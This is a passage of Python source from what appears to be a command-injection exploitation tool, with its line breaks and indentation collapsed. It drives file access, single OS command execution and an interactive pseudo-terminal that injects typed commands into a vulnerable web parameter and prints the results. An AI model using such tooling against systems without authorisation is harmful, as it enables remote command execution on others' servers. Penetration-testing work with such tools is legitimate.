settings.CHOICE_YES: cb_file_access.do_check( separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, timesec) print(settings.SINGLE_WHITESPACE) break elif file_access_again in settings.CHOICE_NO: break elif file_access_again in settings.CHOICE_QUIT: raise SystemExit() else: err_msg = "'" + file_access_again + "' is not a valid answer." print(settings.print_error_msg(err_msg)) pass else: if menu.file_access_options(): # if not menu.enumeration_options(): # print(settings.SINGLE_WHITESPACE) cb_file_access.do_check( separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, timesec) print(settings.SINGLE_WHITESPACE) # Check if defined single cmd. if menu.options.os_cmd: # if not menu.file_access_options(): # print(settings.SINGLE_WHITESPACE) cb_enumeration.single_os_cmd_exec( separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, timesec) # Pseudo-Terminal shell go_back = False go_back_again = False while True: if go_back == True: break if not menu.options.batch: question_msg = "Do you want a Pseudo-Terminal shell? [Y/n] > " gotshell = _input( settings.print_question_msg(question_msg)) else: gotshell = "" if len(gotshell) == 0: gotshell = "Y" if gotshell in settings.CHOICE_YES: # if not menu.options.batch: # print(settings.SINGLE_WHITESPACE) print("Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)") if settings.READLINE_ERROR: checks.no_readline_module() while True: try: if not settings.READLINE_ERROR: checks.tab_autocompleter() sys.stdout.write(settings.OS_SHELL) cmd = _input() cmd = checks.escaped_cmd(cmd) if cmd.lower( ) in settings.SHELL_OPTIONS: go_back, go_back_again = shell_options.check_option( separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, technique, go_back, no_result, timesec, go_back_again, payload, OUTPUT_TEXTFILE="") if go_back and go_back_again == False: break if go_back and go_back_again: return True else: # Command execution results. time.sleep(timesec) response = cb_injector.injection( separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename) # Try target page reload (if it is required). if settings.URL_RELOAD: response = requests.url_reload( url, timesec) if menu.options.ignore_session or \ session_handler.export_stored_cmd(url, cmd, vuln_parameter) == None: # Evaluate injection results. try: shell = cb_injector.injection_results( response, TAG, cmd) shell = "".join( str(p) for p in shell) except: print(settings. SINGLE_WHITESPACE) continue if not menu.options.ignore_session: session_handler.store_cmd( url, cmd, shell, vuln_parameter) else: shell = session_handler.export_stored_cmd( url, cmd, vuln_parameter) if shell: shell = unescape(shell) # Update logs with executed cmds and execution results. logs.executed_command( filename, cmd, shell) if shell != "": print("\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n") else: if settings.VERBOSITY_LEVEL != 0: print(settings. SINGLE_WHITESPACE) err_msg = "The '" + cmd + "' command, does not return any output." print( settings. print_critical_msg( err_msg) + "\n") except KeyboardInterrupt: raise except SystemExit: raise except EOFError: err_msg = "Exiting, due to EOFError." print( settings.print_error_msg(err_msg)) raise elif gotshell in settings.CHOICE_NO: if checks.next_attack_vector( technique, go_back) == True: break else: if no_result == True: return False else: return True elif gotshell in settings.CHOICE_QUIT: raise SystemExit() else: err_msg = "'" + gotshell + "' is not a valid answer." print(settings.print_error_msg(err_msg)) pass if no_result == True: if settings.VERBOSITY_LEVEL == 0: print(settings.SINGLE_WHITESPACE) return False else: sys.stdout.write("\r") sys.stdout.flush()